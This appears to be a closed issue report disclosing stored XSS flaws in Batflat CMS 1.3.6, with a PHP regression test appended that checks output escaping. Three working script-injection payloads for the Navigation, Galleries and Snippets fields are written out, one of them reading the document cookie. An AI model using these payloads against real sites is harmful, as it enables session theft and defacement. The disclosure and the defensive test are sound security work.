Closed Tadjmen closed 2 years ago
Multiple Stored XSS Cross-Site Scripting on Batflat CMS 1.3.6
Login with editor account with rights to Navigation, Galleries, Snippets
Add link payload: `"><img src=x onerror=alert(document.cookie)>`
Code being executed:
Add gallery payload: `mlem"><svg/onload=alert(1)>`
Add Snippets payload: `mlem"><svg/onload=alert("TuongNC")>`
Thanks for reporting the problem! Fixes will be available in the next update.
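A regression check for the pending fix, added here as an example; it is not part of the issue thread and not Batflat's code. It assumes the stored fields are written into an HTML attribute, as the `">` prefix in the reported values suggests, and `render_link_raw`, `render_link_escaped` and `element_names` are hypothetical names.

```php
<?php
// Added example, not Batflat's code: the render_* functions are hypothetical
// stand-ins for a template that writes a stored field into an HTML attribute.

// Vulnerable form: the stored value is concatenated into the attribute as-is.
function render_link_raw(string $name): string
{
    return '<a href="/page" title="' . $name . '">link</a>';
}

// Hardened form: encode for the attribute context at output time.
function render_link_escaped(string $name): string
{
    $safe = htmlspecialchars($name, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<a href="/page" title="' . $safe . '">link</a>';
}

// Parse the fragment and list the element names that actually result.
function element_names(string $html): array
{
    libxml_use_internal_errors(true); // tolerate non-XHTML markup quietly
    $doc = new DOMDocument();
    $doc->loadHTML('<div>' . $html . '</div>', LIBXML_NOERROR | LIBXML_NOWARNING);
    libxml_clear_errors();
    $names = [];
    foreach ($doc->getElementsByTagName('*') as $el) {
        $names[] = $el->nodeName;
    }
    // Drop the wrapper elements the parser and this function add.
    return array_values(array_diff($names, ['html', 'body', 'div']));
}

// The three values from the report, used as regression inputs.
$stored = [
    '"><img src=x onerror=alert(document.cookie)>',
    'mlem"><svg/onload=alert(1)>',
    'mlem"><svg/onload=alert("TuongNC")>',
];

foreach ($stored as $value) {
    $raw = element_names(render_link_raw($value));
    $escaped = element_names(render_link_escaped($value));
    printf("raw: [%s]  escaped: [%s]\n", implode(',', $raw), implode(',', $escaped));
    // After encoding, the only element left must be the template's own <a>.
    if ($escaped !== ['a']) {
        throw new RuntimeException('stored value introduced markup: ' . $value);
    }
}
```

The same check applies to each of the three modules named in the report, since the escaping has to happen wherever a stored field is written into markup.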